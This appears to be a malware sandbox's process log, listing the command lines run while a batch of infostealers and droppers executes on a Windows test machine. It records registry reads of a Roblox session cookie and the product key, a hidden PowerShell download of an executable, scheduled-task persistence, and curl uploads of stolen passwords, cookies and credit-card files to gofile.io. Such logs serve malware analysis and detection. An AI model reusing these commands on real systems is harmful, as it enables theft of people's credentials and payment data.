C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD2.tmp" "c:\Users\Admin\AppData\Local\Temp\xfbs1blz\CSC6F1275C1466A4B1FB51355725463AB7.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfb63cc40,0x7ffdfb63cc4c,0x7ffdfb63cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1740,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1720 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2096,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2156,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3064 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3492,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4384 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4660 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4288,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3576,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3064,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4700,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4944,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:1

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7288FB02CAA8AFED10124D7D86A0F655

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIF7A1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240842921 2 CustomActions!CustomActions.CustomActions.StartApp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe"

C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe

"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIFB6B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240843640 8 CustomActions!CustomActions.CustomActions.InstallPing

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=2272,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4308 /prefetch:1

C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe

"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3500,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2236 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3496,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffdfae03cb8,0x7ffdfae03cc8,0x7ffdfae03cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4232,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5192 /prefetch:8

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 820720ED358ACB2F23030A0E73AE6B55 C

C:\Users\Admin\AppData\Local\Temp\shost.exe

shost.exe

C:\Users\Admin\AppData\Local\Temp\shost.exe

shost.exe

C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe

"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"

C:\Windows\system32\taskkill.exe

taskkill /im firefox.exe /t /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5412,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5136,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=4400,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3420,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5052,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4896 /prefetch:1

C:\Windows\system32\calc.exe

calc.exe

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5072,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3836 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5080,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe"

C:\Program Files\Microsoft Office\root\Office16\Winword.exe

"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Windows\System32\drivers\etc\hosts"

C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe

